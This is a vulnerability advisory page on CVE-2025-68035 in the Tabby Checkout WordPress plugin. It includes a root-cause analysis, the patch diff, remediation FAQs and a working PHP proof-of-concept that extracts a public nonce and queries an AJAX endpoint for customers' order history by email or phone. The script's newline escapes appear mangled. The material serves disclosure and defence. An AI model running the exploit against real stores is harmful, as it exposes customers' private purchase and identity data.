What is CVE-2025-68035?

CVE-2025-68035 is a medium severity vulnerability affecting the Tabby Checkout plugin for WordPress, specifically versions up to and including 5.8.4. It allows unauthenticated attackers to access sensitive user or configuration data through an improperly secured AJAX endpoint.

How does the vulnerability work?

The vulnerability arises from a publicly accessible AJAX handler that allows attackers to send a POST request to retrieve order history data using email or phone parameters. Despite a nonce check, the endpoint is accessible to unauthenticated users, making it possible to exploit.

Who is affected by this vulnerability?

Any WordPress site using the Tabby Checkout plugin version 5.8.4 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Tabby Checkout plugin installed. If it is version 5.8.4 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability can be fixed by updating the Tabby Checkout plugin to version 5.9.1 or later, where the vulnerable functionality has been removed. Regularly updating all plugins is a best practice to maintain security.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not the highest, it is significant enough to warrant immediate attention and remediation to protect sensitive data.

What does the proof of concept demonstrate?

The proof of concept shows how an attacker can extract a nonce from a publicly accessible script and use it to exploit the vulnerable AJAX endpoint. This demonstrates the ease of accessing sensitive data without authentication.

What are the consequences of exploitation?

If exploited, this vulnerability can lead to unauthorized access to sensitive customer information, potentially resulting in privacy violations and facilitating further targeted attacks against affected users.

Are there any additional security measures I should take?

In addition to updating the Tabby Checkout plugin, consider implementing security plugins, regular backups, and monitoring for suspicious activity. Keeping all WordPress components up to date is crucial for maintaining site security.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Tabby Checkout plugin temporarily to prevent exploitation. Additionally, review server logs for any suspicious activity related to the vulnerable endpoint.

How can I stay informed about future vulnerabilities?

Subscribe to security bulletins from WordPress and follow reputable security blogs or forums. Regularly check the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68035: Tabby Checkout <= 5.8.4 – Unauthenticated Information Exposure (tabby-checkout)

Q: What types of data are exposed by this vulnerability?

Successful exploitation of this vulnerability can lead to the exposure of sensitive customer information, including purchase history, order details, and personal identifiers linked to specific email addresses or phone numbers.

CVE ID CVE-2025-68035

Plugin tabby-checkout

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 5.8.4

Patched Version 5.9.1

Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68035:
This vulnerability is an unauthenticated information exposure flaw in the Tabby Checkout WordPress plugin. The vulnerability affects all plugin versions up to and including 5.8.4, allowing attackers to extract sensitive user data via a publicly accessible AJAX endpoint. The CVSS score of 5.3 reflects a moderate severity rating.

Atomic Edge research identified the root cause as an improperly secured AJAX handler. The vulnerable function `get_order_history()` in `/includes/class-wc-tabby-ajax.php` was registered via `add_action(‘wc_ajax_get_order_history’, array(__CLASS__, ‘get_order_history’))` at line 4. This endpoint accepted `email` and `phone` query parameters via `get_query_var()` calls at lines 60-61. The function performed a nonce check with `check_ajax_referer()` at line 57, but this check could be bypassed because the endpoint was accessible to unauthenticated users.

The exploitation method involves sending a POST request to the WordPress AJAX handler endpoint `/wp-admin/admin-ajax.php` with the action parameter set to `get_order_history`. Attackers can append email or phone parameters as query strings to retrieve order history data. The payload structure is a standard WordPress AJAX request: `action=get_order_history&security=[valid_nonce]`. The nonce value can be obtained from the publicly exposed `get_order_history_nonce` parameter in the `wc-checkout` script data, which was exposed via the `get_script_data()` function at line 13.

The patch completely removes the vulnerable functionality. In `/includes/class-wc-tabby-ajax.php`, developers deleted the `get_order_history()` function entirely (lines 56-71 removed). They also removed the AJAX action registration at line 4, the nonce generation at line 13, and the query variable registration for `email` and `phone` at lines 17-18. Additionally, the patch removes the `tabby_checkout_promo_theme` configuration option from `/includes/class-wc-settings-tab-tabby.php` (lines 240-246) and cleans up related theme configuration functions in `/includes/class-wc-tabby-promo.php`.

Successful exploitation allows unauthenticated attackers to retrieve order history data associated with specific email addresses or phone numbers. This exposes sensitive customer information including purchase history, order details, and potentially personal identifiers. The data exposure violates privacy expectations and could facilitate further targeted attacks using the harvested information.

Differential between vulnerable and patched code

Code Diff

--- a/tabby-checkout/includes/class-wc-settings-tab-tabby.php
+++ b/tabby-checkout/includes/class-wc-settings-tab-tabby.php
@@ -240,12 +240,6 @@
             );
 */
             $settings_tabby[] = array(
-                'name'     => __( 'Tabby promotions theme', 'tabby-checkout' ),
-                'id'       => 'tabby_checkout_promo_theme',
-                'type'     => 'text',
-                'desc'     => __( 'Used for styling Tabby promotions widget (blank for default)', 'tabby-checkout' ),
-            );
-            $settings_tabby[] = array(
                 'name'     => __( 'Disable for SKUs (one per line)', 'tabby-checkout' ),
                 'id'       => 'tabby_checkout_disable_for_sku',
                 'custom_attributes' => array(
--- a/tabby-checkout/includes/class-wc-tabby-ajax.php
+++ b/tabby-checkout/includes/class-wc-tabby-ajax.php
@@ -1,7 +1,6 @@
 <?php
 class WC_Tabby_AJAX {
     public static function init() {
-        add_action( 'wc_ajax_get_order_history',   array( __CLASS__, 'get_order_history' ) );
         add_action( 'wc_ajax_get_prescoring_data', array( __CLASS__, 'get_prescoring_data' ) );
         add_filter( 'query_vars',                  array( __CLASS__, 'query_vars'        ) );
         add_filter( 'woocommerce_get_script_data', array( __CLASS__, 'get_script_data'   ) , 10, 2);
@@ -9,13 +8,10 @@
     public static function get_script_data($params, $handle) {
         if ($handle == 'wc-checkout') {
             $params['get_prescoring_data_nonce'] = wp_create_nonce( 'get_prescoring_data' );
-            $params['get_order_history_nonce'] = wp_create_nonce( 'get_order_history' );
         }
         return $params;
     }
     public static function query_vars( $vars ) {
-        $vars[] = 'email';
-        $vars[] = 'phone';
         $vars[] = 'buyer';
         return $vars;
     }
@@ -59,21 +55,6 @@
             "availableProducts" => $available_products
         ] );
     }
-    public static function get_order_history() {
-
-        check_ajax_referer( 'get_order_history', 'security' );
-
-        $email = get_query_var('email', false);
-        $phone = get_query_var('phone', false);
-
-        $data = [
-            "email" => $email,
-            "phone" => $phone,
-            "order_history" => self::getOrderHistoryObject($email, $phone)
-        ];
-
-        wp_send_json( $data );
-    }
     public static function getOrderHistoryObject($email, $phone) {
         $result = [];
         if (!$email) return $result;
--- a/tabby-checkout/includes/class-wc-tabby-promo.php
+++ b/tabby-checkout/includes/class-wc-tabby-promo.php
@@ -115,16 +115,12 @@
             "publicKey" => self::getPublicKey(),
             "shouldInheritBg" => self::getShouldInheritBg(),
             "lang"      => self::getLocale(),
-            "localeSource"=> get_option('tabby_checkout_locale_html') == 'yes' ? 'html' : '',
             "currency"  => self::getCurrency(),
             "price"     => self::getPrice(),
             "email"     => self::getEmail(),
             "phone"     => self::getPhone(),
             "source"    => self::getSource(),
             "sourcePlugin"=> 'woo',
-            "theme"     => self::getTheme(),
-            "installmentsCount" => self::getInstallmentsCount(),
-            "productType"=> self::getProductType(),
         ];
     }
     public static function getShouldInheritBg() {
@@ -154,20 +150,6 @@

         return $type_price >= 0 && self::getPrice() >= $type_price;
     }
-    public static function getPromoThemeConfig() {
-        $theme = explode(':', get_option('tabby_checkout_promo_theme', ''));
-
-        return [
-            'theme'     => array_shift($theme),
-            'installmentsCount' => !empty($theme) ? 0 : 4
-        ];
-    }
-    public static function getTheme() {
-        return self::getPromoThemeConfig()['theme'];
-    }
-    public static function getInstallmentsCount() {
-        return self::getProductType() == 'installments' ? self::getPromoThemeConfig()['installmentsCount'] : 4;
-    }
     public static function getSource() {
         return is_admin() ? 'adminBlockEditor' : (is_product() ? 'product' : 'cart');
     }
--- a/tabby-checkout/tabby-checkout.php
+++ b/tabby-checkout/tabby-checkout.php
@@ -3,7 +3,7 @@
  * Plugin Name: Tabby Checkout
  * Plugin URI: https://tabby.ai/
  * Description: Tabby Checkout
- * Version: 5.8.4
+ * Version: 5.9.1
  * Author: Tabby
  * Author URI: https://tabby.ai
  * License: GPLv2
@@ -14,7 +14,7 @@

 defined( 'ABSPATH' ) || exit;

-define ('MODULE_TABBY_CHECKOUT_VERSION', '5.8.4');
+define ('MODULE_TABBY_CHECKOUT_VERSION', '5.9.1');
 define ('TABBY_CHECKOUT_DOMAIN', 'checkout.tabby.ai');
 define ('TABBY_CHECKOUT_API_DOMAIN', 'api.tabby.ai');
 define ('TABBY_FEED_API_DOMAIN', 'plugins-api.tabby.ai');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68035 - Tabby Checkout <= 5.8.4 - Unauthenticated Information Exposure

<?php

$target_url = 'https://vulnerable-site.com';

// Step 1: Extract the required nonce from the wc-checkout script data
function extract_nonce($target_url) {
    // Load a product or cart page to get the script data
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url . '/shop/');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Parse the HTML to find the wc-checkout script data
    if (preg_match('/var wc_checkout_params = ({.*?});/s', $response, $matches)) {
        $json_data = json_decode($matches[1], true);
        if (isset($json_data['get_order_history_nonce'])) {
            return $json_data['get_order_history_nonce'];
        }
    }
    return null;
}

// Step 2: Exploit the vulnerable endpoint
function exploit_order_history($target_url, $email, $phone, $nonce) {
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    
    // Build the query string with parameters
    $query_params = [
        'email' => $email,
        'phone' => $phone
    ];
    $query_string = http_build_query($query_params);
    
    // Build the POST data
    $post_data = [
        'action' => 'get_order_history',
        'security' => $nonce
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $ajax_url . '?' . $query_string);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return [
        'code' => $http_code,
        'response' => json_decode($response, true)
    ];
}

// Main execution
$nonce = extract_nonce($target_url);

if ($nonce) {
    echo "[+] Extracted nonce: $noncen";
    
    // Test with example email or phone
    $email = 'test@example.com';
    $phone = '+1234567890';
    
    $result = exploit_order_history($target_url, $email, $phone, $nonce);
    
    echo "[+] HTTP Status: " . $result['code'] . "n";
    echo "[+] Response: " . json_encode($result['response'], JSON_PRETTY_PRINT) . "n";
    
    if ($result['code'] == 200 && isset($result['response']['order_history'])) {
        echo "[!] VULNERABLE: Successfully retrieved order history datan";
    }
} else {
    echo "[-] Failed to extract nonce. The site may not be vulnerable or running a patched version.n";
}

?>

Frequently Asked Questions

What is CVE-2025-68035?
Overview of the vulnerability
CVE-2025-68035 is a medium severity vulnerability affecting the Tabby Checkout plugin for WordPress, specifically versions up to and including 5.8.4. It allows unauthenticated attackers to access sensitive user or configuration data through an improperly secured AJAX endpoint.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a publicly accessible AJAX handler that allows attackers to send a POST request to retrieve order history data using email or phone parameters. Despite a nonce check, the endpoint is accessible to unauthenticated users, making it possible to exploit.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Tabby Checkout plugin version 5.8.4 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Tabby Checkout plugin installed. If it is version 5.8.4 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Steps to mitigate the risk
The vulnerability can be fixed by updating the Tabby Checkout plugin to version 5.9.1 or later, where the vulnerable functionality has been removed. Regularly updating all plugins is a best practice to maintain security.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not the highest, it is significant enough to warrant immediate attention and remediation to protect sensitive data.
What types of data are exposed by this vulnerability?
Potential data leakage
Successful exploitation of this vulnerability can lead to the exposure of sensitive customer information, including purchase history, order details, and personal identifiers linked to specific email addresses or phone numbers.
What does the proof of concept demonstrate?
Illustrating the vulnerability
The proof of concept shows how an attacker can extract a nonce from a publicly accessible script and use it to exploit the vulnerable AJAX endpoint. This demonstrates the ease of accessing sensitive data without authentication.
What are the consequences of exploitation?
Impact of a successful attack
If exploited, this vulnerability can lead to unauthorized access to sensitive customer information, potentially resulting in privacy violations and facilitating further targeted attacks against affected users.
Are there any additional security measures I should take?
Best practices for WordPress security
In addition to updating the Tabby Checkout plugin, consider implementing security plugins, regular backups, and monitoring for suspicious activity. Keeping all WordPress components up to date is crucial for maintaining site security.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Tabby Checkout plugin temporarily to prevent exploitation. Additionally, review server logs for any suspicious activity related to the vulnerable endpoint.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Subscribe to security bulletins from WordPress and follow reputable security blogs or forums. Regularly check the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations